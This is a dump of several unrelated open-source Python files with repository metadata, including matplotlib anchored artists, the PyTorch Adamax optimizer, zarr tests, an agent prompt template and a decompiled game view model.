7fe5cb99188c7270f726b1145fc356fd2922df9d
|
/geoapi/src/main/python/opengis/geometry/__init__.py
|
ade90e843bf60fe43c22c6f6e91d6e4fc6b8e60d
|
[
"Apache-2.0"
] |
permissive
|
opengeospatial/geoapi
|
eedcf2d3259284fc614f7fa132c77fcef67d7ecc
|
7a0872373e4ad70039b5ec9be2f086081fb5c746
|
refs/heads/master
| 2023-08-17T23:37:23.874101
| 2023-08-10T20:02:27
| 2023-08-10T20:02:27
| 27,879,839
| 111
| 33
|
NOASSERTION
| 2021-06-28T08:08:29
| 2014-12-11T16:13:54
|
Java
|
UTF-8
|
Python
| false
| false
| 90
|
py
|
__init__.py
|
"""
Geographic metadata structures derived from the ISO 19107 international standard.
"""
|
9a17f3f050fa72393e63b9cda4903819e6d37e3c
|
57c0a57269dfc516c7f46468940efb62cb863af4
|
/langchain/agents/conversational/prompt.py
|
15268a760834452eb3ff990ca6548a80788271d3
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
microsoft/MM-REACT
|
e67a843faadf4752f5e9d0e2dbf0c80068dbd288
|
b8f29af7f3c24cf3a4554bebfa2053064467fbdb
|
refs/heads/main
| 2023-08-31T03:01:42.246514
| 2023-05-12T20:43:11
| 2023-05-12T20:43:11
| 614,230,777
| 705
| 57
|
MIT
| 2023-08-30T00:04:13
| 2023-03-15T06:56:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,859
|
py
|
prompt.py
|
# flake8: noqa
PREFIX = """Assistant is a large language model trained by OpenAI.
Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.
Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.
Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.
TOOLS:
------
Assistant has access to the following tools:"""
FORMAT_INSTRUCTIONS = """To use a tool, please use the following format:
```
Thought: Do I need to use a tool? Yes
Action: the action to take, should be one of [{tool_names}]
Action Input: the input to the action
Observation: the result of the action
```
When you have a response to say to the Human, or if you do not need to use a tool, you MUST use the format:
```
Thought: Do I need to use a tool? No
{ai_prefix}: [your response here]
```"""
SUFFIX = """Begin!
Previous conversation history:
{chat_history}
New input: {input}
{agent_scratchpad}"""
|
da16793958b33ebd05ec7428b86edb5da64fe2ca
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/matplotlib/py2/mpl_toolkits/axes_grid1/anchored_artists.py
|
5b492858e8da5f78117d773190635036f3af80ce
|
[
"Apache-2.0"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 13,214
|
py
|
anchored_artists.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from matplotlib import docstring
from matplotlib.offsetbox import (AnchoredOffsetbox, AuxTransformBox,
DrawingArea, TextArea, VPacker)
from matplotlib.patches import Rectangle, Ellipse
__all__ = ['AnchoredDrawingArea', 'AnchoredAuxTransformBox',
'AnchoredEllipse', 'AnchoredSizeBar']
class AnchoredDrawingArea(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, width, height, xdescent, ydescent,
loc, pad=0.4, borderpad=0.5, prop=None, frameon=True,
**kwargs):
"""
An anchored container with a fixed size and fillable DrawingArea.
Artists added to the *drawing_area* will have their coordinates
interpreted as pixels. Any transformations set on the artists will be
overridden.
Parameters
----------
width, height : int or float
width and height of the container, in pixels.
xdescent, ydescent : int or float
descent of the container in the x- and y- direction, in pixels.
loc : int
Location of this artist. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the child objects, in fraction of the font
size. Defaults to 0.4.
borderpad : int or float, optional
Border padding, in fraction of the font size.
Defaults to 0.5.
prop : `matplotlib.font_manager.FontProperties`, optional
Font property used as a reference for paddings.
frameon : bool, optional
If True, draw a box around this artists. Defaults to True.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
drawing_area : `matplotlib.offsetbox.DrawingArea`
A container for artists to display.
Examples
--------
To display blue and red circles of different sizes in the upper right
of an axes *ax*:
>>> ada = AnchoredDrawingArea(20, 20, 0, 0, loc=1, frameon=False)
>>> ada.drawing_area.add_artist(Circle((10, 10), 10, fc="b"))
>>> ada.drawing_area.add_artist(Circle((30, 10), 5, fc="r"))
>>> ax.add_artist(ada)
"""
self.da = DrawingArea(width, height, xdescent, ydescent)
self.drawing_area = self.da
super(AnchoredDrawingArea, self).__init__(
loc, pad=pad, borderpad=borderpad, child=self.da, prop=None,
frameon=frameon, **kwargs
)
class AnchoredAuxTransformBox(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, transform, loc,
pad=0.4, borderpad=0.5, prop=None, frameon=True, **kwargs):
"""
An anchored container with transformed coordinates.
Artists added to the *drawing_area* are scaled according to the
coordinates of the transformation used. The dimensions of this artist
will scale to contain the artists added.
Parameters
----------
transform : `matplotlib.transforms.Transform`
The transformation object for the coordinate system in use, i.e.,
:attr:`matplotlib.axes.Axes.transData`.
loc : int
Location of this artist. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the child objects, in fraction of the font
size. Defaults to 0.4.
borderpad : int or float, optional
Border padding, in fraction of the font size.
Defaults to 0.5.
prop : `matplotlib.font_manager.FontProperties`, optional
Font property used as a reference for paddings.
frameon : bool, optional
If True, draw a box around this artists. Defaults to True.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
drawing_area : `matplotlib.offsetbox.AuxTransformBox`
A container for artists to display.
Examples
--------
To display an ellipse in the upper left, with a width of 0.1 and
height of 0.4 in data coordinates:
>>> box = AnchoredAuxTransformBox(ax.transData, loc=2)
>>> el = Ellipse((0,0), width=0.1, height=0.4, angle=30)
>>> box.drawing_area.add_artist(el)
>>> ax.add_artist(box)
"""
self.drawing_area = AuxTransformBox(transform)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,
child=self.drawing_area,
prop=prop,
frameon=frameon,
**kwargs)
class AnchoredEllipse(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, transform, width, height, angle, loc,
pad=0.1, borderpad=0.1, prop=None, frameon=True, **kwargs):
"""
Draw an anchored ellipse of a given size.
Parameters
----------
transform : `matplotlib.transforms.Transform`
The transformation object for the coordinate system in use, i.e.,
:attr:`matplotlib.axes.Axes.transData`.
width, height : int or float
Width and height of the ellipse, given in coordinates of
*transform*.
angle : int or float
Rotation of the ellipse, in degrees, anti-clockwise.
loc : int
Location of this size bar. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the ellipse, in fraction of the font size. Defaults
to 0.1.
borderpad : int or float, optional
Border padding, in fraction of the font size. Defaults to 0.1.
frameon : bool, optional
If True, draw a box around the ellipse. Defaults to True.
prop : `matplotlib.font_manager.FontProperties`, optional
Font property used as a reference for paddings.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
ellipse : `matplotlib.patches.Ellipse`
Ellipse patch drawn.
"""
self._box = AuxTransformBox(transform)
self.ellipse = Ellipse((0, 0), width, height, angle)
self._box.add_artist(self.ellipse)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,
child=self._box,
prop=prop,
frameon=frameon, **kwargs)
class AnchoredSizeBar(AnchoredOffsetbox):
@docstring.dedent
def __init__(self, transform, size, label, loc,
pad=0.1, borderpad=0.1, sep=2,
frameon=True, size_vertical=0, color='black',
label_top=False, fontproperties=None, fill_bar=None,
**kwargs):
"""
Draw a horizontal scale bar with a center-aligned label underneath.
Parameters
----------
transform : `matplotlib.transforms.Transform`
The transformation object for the coordinate system in use, i.e.,
:attr:`matplotlib.axes.Axes.transData`.
size : int or float
Horizontal length of the size bar, given in coordinates of
*transform*.
label : str
Label to display.
loc : int
Location of this size bar. Valid location codes are::
'upper right' : 1,
'upper left' : 2,
'lower left' : 3,
'lower right' : 4,
'right' : 5,
'center left' : 6,
'center right' : 7,
'lower center' : 8,
'upper center' : 9,
'center' : 10
pad : int or float, optional
Padding around the label and size bar, in fraction of the font
size. Defaults to 0.1.
borderpad : int or float, optional
Border padding, in fraction of the font size.
Defaults to 0.1.
sep : int or float, optional
Separation between the label and the size bar, in points.
Defaults to 2.
frameon : bool, optional
If True, draw a box around the horizontal bar and label.
Defaults to True.
size_vertical : int or float, optional
Vertical length of the size bar, given in coordinates of
*transform*. Defaults to 0.
color : str, optional
Color for the size bar and label.
Defaults to black.
label_top : bool, optional
If True, the label will be over the size bar.
Defaults to False.
fontproperties : `matplotlib.font_manager.FontProperties`, optional
Font properties for the label text.
fill_bar : bool, optional
If True and if size_vertical is nonzero, the size bar will
be filled in with the color specified by the size bar.
Defaults to True if `size_vertical` is greater than
zero and False otherwise.
**kwargs :
Keyworded arguments to pass to
:class:`matplotlib.offsetbox.AnchoredOffsetbox`.
Attributes
----------
size_bar : `matplotlib.offsetbox.AuxTransformBox`
Container for the size bar.
txt_label : `matplotlib.offsetbox.TextArea`
Container for the label of the size bar.
Notes
-----
If *prop* is passed as a keyworded argument, but *fontproperties* is
not, then *prop* is be assumed to be the intended *fontproperties*.
Using both *prop* and *fontproperties* is not supported.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> from mpl_toolkits.axes_grid1.anchored_artists import \
AnchoredSizeBar
>>> fig, ax = plt.subplots()
>>> ax.imshow(np.random.random((10,10)))
>>> bar = AnchoredSizeBar(ax.transData, 3, '3 data units', 4)
>>> ax.add_artist(bar)
>>> fig.show()
Using all the optional parameters
>>> import matplotlib.font_manager as fm
>>> fontprops = fm.FontProperties(size=14, family='monospace')
>>> bar = AnchoredSizeBar(ax.transData, 3, '3 units', 4, pad=0.5, \
sep=5, borderpad=0.5, frameon=False, \
size_vertical=0.5, color='white', \
fontproperties=fontprops)
"""
if fill_bar is None:
fill_bar = size_vertical > 0
self.size_bar = AuxTransformBox(transform)
self.size_bar.add_artist(Rectangle((0, 0), size, size_vertical,
fill=fill_bar, facecolor=color,
edgecolor=color))
if fontproperties is None and 'prop' in kwargs:
fontproperties = kwargs.pop('prop')
if fontproperties is None:
textprops = {'color': color}
else:
textprops = {'color': color, 'fontproperties': fontproperties}
self.txt_label = TextArea(
label,
minimumdescent=False,
textprops=textprops)
if label_top:
_box_children = [self.txt_label, self.size_bar]
else:
_box_children = [self.size_bar, self.txt_label]
self._box = VPacker(children=_box_children,
align="center",
pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,
child=self._box,
prop=fontproperties,
frameon=frameon, **kwargs)
|
8adfb0ebc87b8cd572bdd7cc5adff80d6cac0b19
|
c5f0246cc8601aeedae2c63ebe7e82406ea3fc7f
|
/zarr/tests/test_dim_separator.py
|
987852dfd00481aa7ff892df4d1847d3c9b6aa53
|
[
"MIT"
] |
permissive
|
zarr-developers/zarr-python
|
56d2f3633c8eeb415ee81076ec942160d7839ca2
|
4944e66cd847a6ab5ec3a70c2b7bc0973f707bd6
|
refs/heads/main
| 2023-09-01T15:02:16.892360
| 2023-08-28T07:09:20
| 2023-08-28T07:09:20
| 48,049,137
| 908
| 200
|
MIT
| 2023-09-14T04:36:44
| 2015-12-15T14:49:40
|
Python
|
UTF-8
|
Python
| false
| false
| 4,219
|
py
|
test_dim_separator.py
|
import pathlib
import pytest
from numpy.testing import assert_array_equal
from functools import partial
import zarr
from zarr.core import Array
from zarr.storage import DirectoryStore, NestedDirectoryStore, FSStore
from zarr.tests.util import have_fsspec
needs_fsspec = pytest.mark.skipif(not have_fsspec, reason="needs fsspec")
@pytest.fixture(
params=(
"static_flat",
"static_flat_legacy",
"static_nested",
"static_nested_legacy",
"directory_nested",
"directory_flat",
"directory_default",
"nesteddirectory_nested",
"nesteddirectory_default",
pytest.param("fs_nested", marks=needs_fsspec),
pytest.param("fs_flat", marks=needs_fsspec),
pytest.param("fs_default", marks=needs_fsspec),
)
)
def dataset(tmpdir, request):
"""
Generate a variety of different Zarrs using
different store implementations as well as
different dimension_separator arguments.
"""
loc = tmpdir.join("dim_sep_test.zarr")
which = request.param
kwargs = {}
if which.startswith("static"):
project_root = pathlib.Path(zarr.__file__).resolve().parent.parent
suffix = which[len("static_") :]
static = project_root / "fixture" / suffix
if not static.exists(): # pragma: no cover
if "nested" in which:
# No way to reproduce the nested_legacy file via code
generator = NestedDirectoryStore
else:
if "legacy" in suffix:
# No dimension_separator metadata included
generator = DirectoryStore
else:
# Explicit dimension_separator metadata included
generator = partial(DirectoryStore, dimension_separator=".")
# store the data - should be one-time operation
s = generator(str(static))
a = zarr.open(store=s, mode="w", shape=(2, 2), dtype="<i8")
a[:] = [[1, 2], [3, 4]]
return str(static)
if which.startswith("directory"):
store_class = DirectoryStore
elif which.startswith("nested"):
store_class = NestedDirectoryStore
else:
store_class = FSStore
kwargs["mode"] = "w"
kwargs["auto_mkdir"] = True
if which.endswith("nested"):
kwargs["dimension_separator"] = "/"
elif which.endswith("flat"):
kwargs["dimension_separator"] = "."
store = store_class(str(loc), **kwargs)
zarr.creation.array(store=store, data=[[1, 2], [3, 4]])
return str(loc)
def verify(array, expect_failure=False):
try:
assert_array_equal(array[:], [[1, 2], [3, 4]])
except AssertionError:
if expect_failure:
pytest.xfail()
else:
raise # pragma: no cover
def test_open(dataset):
"""
Use zarr.open to open the dataset fixture. Legacy nested datasets
without the dimension_separator metadata are not expected to be
openable.
"""
failure = "nested_legacy" in dataset
verify(zarr.open(dataset, "r"), failure)
@needs_fsspec
def test_fsstore(dataset):
"""
Use FSStore to open the dataset fixture. Legacy nested datasets
without the dimension_separator metadata are not expected to be
openable.
"""
failure = "nested_legacy" in dataset
verify(Array(store=FSStore(dataset)), failure)
def test_directory(dataset):
"""
Use DirectoryStore to open the dataset fixture. Legacy nested datasets
without the dimension_separator metadata are not expected to be
openable.
"""
failure = "nested_legacy" in dataset
verify(zarr.Array(store=DirectoryStore(dataset)), failure)
def test_nested(dataset):
"""
Use NestedDirectoryStore to open the dataset fixture. This is the only
method that is expected to successfully open legacy nested datasets
without the dimension_separator metadata. However, for none-Nested
datasets without any metadata, NestedDirectoryStore will fail.
"""
failure = "flat_legacy" in dataset or "directory_default" in dataset or "fs_default" in dataset
verify(Array(store=NestedDirectoryStore(dataset)), failure)
|
bada6e9a2aad3aaa38f27c33af7162653ca34595
|
e0cfa3707e632da3d7e0f1aa5882927a64d2872a
|
/test/e2e/pageobjects/preview_page.py
|
7173a982a17cdf540bd6d8b5e4a39b1d6ff04d12
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
supakeen/pinnwand
|
055b50ac5cab2f6408e2d97c54ae4df3a56a8051
|
644c7ade47c4682e9aeb7495700577ea89443f23
|
refs/heads/master
| 2023-08-25T03:25:27.535971
| 2023-08-24T07:19:46
| 2023-08-24T10:33:24
| 171,712,839
| 146
| 34
|
MIT
| 2023-09-06T18:38:19
| 2019-02-20T16:52:16
|
Python
|
UTF-8
|
Python
| false
| false
| 516
|
py
|
preview_page.py
|
import logging
from test.e2e.pageobjects.base_page import BasePage
from playwright.sync_api import Page, expect
log = logging.getLogger(__name__)
class PreviewPage(BasePage):
def __init__(self, page: Page) -> None:
super().__init__(page, page.locator("pre"), "Preview Page")
self.page = page
# Expectations
def should_have_content(self, content):
expect(
self.page_locator,
f"Content of {self.page_name} was incorrect",
).to_have_text(content)
|
c24686ed7463457769a6178a7ad44a4d20199953
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/torch/optim/adamax.py
|
f8d1fb0178fdae893710f98d08164b5f5e0cc7f3
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 12,403
|
py
|
adamax.py
|
import torch
from torch import Tensor
from .optimizer import (Optimizer, _use_grad_for_differentiable, _get_value, _stack_if_compiling,
_default_to_fused_or_foreach, _differentiable_doc, _maximize_doc, _foreach_doc)
from typing import List, Optional
__all__ = ["Adamax", "adamax"]
class Adamax(Optimizer):
def __init__(
self,
params,
lr=2e-3,
betas=(0.9, 0.999),
eps=1e-8,
weight_decay=0,
foreach: Optional[bool] = None,
*,
maximize: bool = False,
differentiable: bool = False,
):
if not 0.0 <= lr:
raise ValueError(f"Invalid learning rate: {lr}")
if not 0.0 <= eps:
raise ValueError(f"Invalid epsilon value: {eps}")
if not 0.0 <= betas[0] < 1.0:
raise ValueError(f"Invalid beta parameter at index 0: {betas[0]}")
if not 0.0 <= betas[1] < 1.0:
raise ValueError(f"Invalid beta parameter at index 1: {betas[1]}")
if not 0.0 <= weight_decay:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = dict(
lr=lr,
betas=betas,
eps=eps,
weight_decay=weight_decay,
foreach=foreach,
maximize=maximize,
differentiable=differentiable,
)
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("foreach", None)
group.setdefault("maximize", False)
group.setdefault("differentiable", False)
state_values = list(self.state.values())
step_is_tensor = (len(state_values) != 0) and torch.is_tensor(
state_values[0]["step"]
)
if not step_is_tensor:
for s in state_values:
s["step"] = torch.tensor(float(s["step"]))
def _init_group(self, group, params_with_grad, grads, exp_avgs, exp_infs, state_steps):
for p in group["params"]:
if p.grad is None:
continue
params_with_grad.append(p)
if p.grad.is_sparse:
raise RuntimeError("Adamax does not support sparse gradients")
grads.append(p.grad)
state = self.state[p]
# State initialization
if len(state) == 0:
state["step"] = torch.tensor(0.0)
state["exp_avg"] = torch.zeros_like(
p, memory_format=torch.preserve_format
)
state["exp_inf"] = torch.zeros_like(
p, memory_format=torch.preserve_format
)
exp_avgs.append(state["exp_avg"])
exp_infs.append(state["exp_inf"])
state_steps.append(state["step"])
@_use_grad_for_differentiable
def step(self, closure=None):
"""Performs a single optimization step.
Args:
closure (Callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
params_with_grad = []
grads = []
exp_avgs = []
exp_infs = []
state_steps = []
beta1, beta2 = group["betas"]
eps = group["eps"]
lr = group["lr"]
weight_decay = group["weight_decay"]
foreach = group["foreach"]
maximize = group["maximize"]
differentiable = group["differentiable"]
self._init_group(group, params_with_grad, grads, exp_avgs, exp_infs, state_steps)
adamax(
params_with_grad,
grads,
exp_avgs,
exp_infs,
state_steps,
eps=eps,
beta1=beta1,
beta2=beta2,
lr=lr,
weight_decay=weight_decay,
foreach=foreach,
maximize=maximize,
differentiable=differentiable,
)
return loss
Adamax.__doc__ = r"""Implements Adamax algorithm (a variant of Adam based on infinity norm).
.. math::
\begin{aligned}
&\rule{110mm}{0.4pt} \\
&\textbf{input} : \gamma \text{ (lr)}, \beta_1, \beta_2
\text{ (betas)},\theta_0 \text{ (params)},f(\theta) \text{ (objective)},
\: \lambda \text{ (weight decay)}, \\
&\hspace{13mm} \epsilon \text{ (epsilon)} \\
&\textbf{initialize} : m_0 \leftarrow 0 \text{ ( first moment)},
u_0 \leftarrow 0 \text{ ( infinity norm)} \\[-1.ex]
&\rule{110mm}{0.4pt} \\
&\textbf{for} \: t=1 \: \textbf{to} \: \ldots \: \textbf{do} \\
&\hspace{5mm}g_t \leftarrow \nabla_{\theta} f_t (\theta_{t-1}) \\
&\hspace{5mm}if \: \lambda \neq 0 \\
&\hspace{10mm} g_t \leftarrow g_t + \lambda \theta_{t-1} \\
&\hspace{5mm}m_t \leftarrow \beta_1 m_{t-1} + (1 - \beta_1) g_t \\
&\hspace{5mm}u_t \leftarrow \mathrm{max}(\beta_2 u_{t-1}, |g_{t}|+\epsilon) \\
&\hspace{5mm}\theta_t \leftarrow \theta_{t-1} - \frac{\gamma m_t}{(1-\beta^t_1) u_t} \\
&\rule{110mm}{0.4pt} \\[-1.ex]
&\bf{return} \: \theta_t \\[-1.ex]
&\rule{110mm}{0.4pt} \\[-1.ex]
\end{aligned}
For further details regarding the algorithm we refer to `Adam: A Method for Stochastic Optimization`_.
""" + fr"""
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
{_foreach_doc}
{_maximize_doc}
{_differentiable_doc}
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
"""
def adamax(
params: List[Tensor],
grads: List[Tensor],
exp_avgs: List[Tensor],
exp_infs: List[Tensor],
state_steps: List[Tensor],
# kwonly args with defaults are not supported by functions compiled with torchscript issue #70627
# setting this as kwarg for now as functional API is compiled by torch/distributed/optim
foreach: Optional[bool] = None,
maximize: bool = False,
differentiable: bool = False,
*,
eps: float,
beta1: float,
beta2: float,
lr: float,
weight_decay: float,
):
r"""Functional API that performs adamax algorithm computation.
See :class:`~torch.optim.Adamax` for details.
"""
if not all(isinstance(t, torch.Tensor) for t in state_steps):
raise RuntimeError(
"API has changed, `state_steps` argument must contain a list of singleton tensors"
)
if foreach is None:
_, foreach = _default_to_fused_or_foreach(params, differentiable, use_fused=False)
if foreach and torch.jit.is_scripting():
raise RuntimeError("torch.jit.script not supported with foreach optimizers")
if foreach and not torch.jit.is_scripting():
func = _multi_tensor_adamax
else:
func = _single_tensor_adamax
func(
params,
grads,
exp_avgs,
exp_infs,
state_steps,
eps=eps,
beta1=beta1,
beta2=beta2,
lr=lr,
weight_decay=weight_decay,
maximize=maximize,
differentiable=differentiable,
)
def _single_tensor_adamax(
params: List[Tensor],
grads: List[Tensor],
exp_avgs: List[Tensor],
exp_infs: List[Tensor],
state_steps: List[Tensor],
*,
eps: float,
beta1: float,
beta2: float,
lr: float,
weight_decay: float,
maximize: bool,
differentiable: bool,
):
for i, param in enumerate(params):
grad = grads[i]
grad = grad if not maximize else -grad
exp_avg = exp_avgs[i]
exp_inf = exp_infs[i]
step_t = state_steps[i]
# update step
step_t += 1
if weight_decay != 0:
grad = grad.add(param, alpha=weight_decay)
if torch.is_complex(param):
param = torch.view_as_real(param)
grad = torch.view_as_real(grad)
exp_avg = torch.view_as_real(exp_avg)
exp_inf = torch.view_as_real(exp_inf)
# Update biased first moment estimate.
exp_avg.lerp_(grad, 1 - beta1)
# Update the exponentially weighted infinity norm.
norm_buf = torch.cat(
[exp_inf.mul_(beta2).unsqueeze(0), grad.abs().add_(eps).unsqueeze_(0)], 0
)
if not differentiable:
torch.amax(norm_buf, 0, keepdim=False, out=exp_inf)
else:
exp_inf.copy_(torch.amax(norm_buf, 0, keepdim=False))
bias_correction = 1 - beta1 ** _get_value(step_t)
clr = lr / bias_correction
param.addcdiv_(exp_avg, exp_inf, value=-clr)
def _multi_tensor_adamax(
params: List[Tensor],
grads: List[Tensor],
exp_avgs: List[Tensor],
exp_infs: List[Tensor],
state_steps: List[Tensor],
*,
beta1: float,
beta2: float,
lr: float,
weight_decay: float,
eps: float,
maximize: bool,
differentiable: bool,
):
assert not differentiable, "_foreach ops don't support autograd"
if len(params) == 0:
return
grouped_tensors = Optimizer._group_tensors_by_device_and_dtype([params, grads, exp_avgs, exp_infs, state_steps])
for ((grouped_params, grouped_grads, grouped_exp_avgs, grouped_exp_infs, grouped_state_steps), _) in grouped_tensors.values():
if maximize:
grouped_grads = torch._foreach_neg(grouped_grads)
grouped_params = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_params]
grouped_grads = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_grads]
grouped_exp_avgs = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_exp_avgs]
grouped_exp_infs = [torch.view_as_real(x) if torch.is_complex(x) else x for x in grouped_exp_infs]
# Update steps
torch._foreach_add_(grouped_state_steps, 1)
if weight_decay != 0:
if maximize:
# Re-use the intermediate memory (device_grads) already allocated for maximize
torch._foreach_add_(grouped_grads, grouped_params, alpha=weight_decay)
else:
grouped_grads = torch._foreach_add(grouped_grads, grouped_params, alpha=weight_decay)
# Update biased first moment estimate.
torch._foreach_lerp_(grouped_exp_avgs, grouped_grads, 1 - beta1)
# Update the exponentially weighted infinity norm.
torch._foreach_mul_(grouped_exp_infs, beta2)
for exp_inf, grad in zip(grouped_exp_infs, grouped_grads):
norm_buf = torch.cat(
[exp_inf.unsqueeze(0), grad.abs().add_(eps).unsqueeze_(0)], 0
)
torch.max(norm_buf, 0, keepdim=False, out=(exp_inf, exp_inf.new().long()))
bias_corrections = [1 - beta1 ** _get_value(step) for step in grouped_state_steps]
clr = _stack_if_compiling([-1 * (lr / bias_correction) for bias_correction in bias_corrections])
torch._foreach_addcdiv_(grouped_params, grouped_exp_avgs, grouped_exp_infs, clr)
|
d25a9a33a83b398ecca4ac52b6310ce0e0b699a8
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Configuration/Geometry/python/dependencies.py
|
7ed3e0a09b8f8b31b81db5a174b47af6cce32966
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 154
|
py
|
dependencies.py
|
# this file exists to enforce dependencies for the generate2026Geometry unit test
from Configuration.StandardSequences.GeometryConf import GeometryConf
|
9cc854ce13ea3cb1f08863d099752927b85336f8
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/impl/gen/view_models/views/lobby/battle_pass/battle_pass_off_season_view_model.py
|
ebbc686e3d4d14bad78a046f5873a33f5146e6fb
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,900
|
py
|
battle_pass_off_season_view_model.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/impl/gen/view_models/views/lobby/battle_pass/battle_pass_off_season_view_model.py
from frameworks.wulf import ViewModel
class BattlePassOffSeasonViewModel(ViewModel):
__slots__ = ()
LOSE_VOTE = 'loseVote'
WIN_VOTE = 'winVote'
NOT_VOTE = 'notVote'
def __init__(self, properties=12, commands=0):
super(BattlePassOffSeasonViewModel, self).__init__(properties=properties, commands=commands)
def getLevel(self):
return self._getNumber(0)
def setLevel(self, value):
self._setNumber(0, value)
def getHasBattlePass(self):
return self._getBool(1)
def setHasBattlePass(self, value):
self._setBool(1, value)
def getIsPostProgression(self):
return self._getBool(2)
def setIsPostProgression(self, value):
self._setBool(2, value)
def getIsPostProgressionCompleted(self):
return self._getBool(3)
def setIsPostProgressionCompleted(self, value):
self._setBool(3, value)
def getIsEnabled(self):
return self._getBool(4)
def setIsEnabled(self, value):
self._setBool(4, value)
def getLeftVehicle(self):
return self._getString(5)
def setLeftVehicle(self, value):
self._setString(5, value)
def getLeftPoints(self):
return self._getNumber(6)
def setLeftPoints(self, value):
self._setNumber(6, value)
def getRightVehicle(self):
return self._getString(7)
def setRightVehicle(self, value):
self._setString(7, value)
def getRightPoints(self):
return self._getNumber(8)
def setRightPoints(self, value):
self._setNumber(8, value)
def getSeasonName(self):
return self._getString(9)
def setSeasonName(self, value):
self._setString(9, value)
def getIsFailedService(self):
return self._getBool(10)
def setIsFailedService(self, value):
self._setBool(10, value)
def getVoteStatus(self):
return self._getString(11)
def setVoteStatus(self, value):
self._setString(11, value)
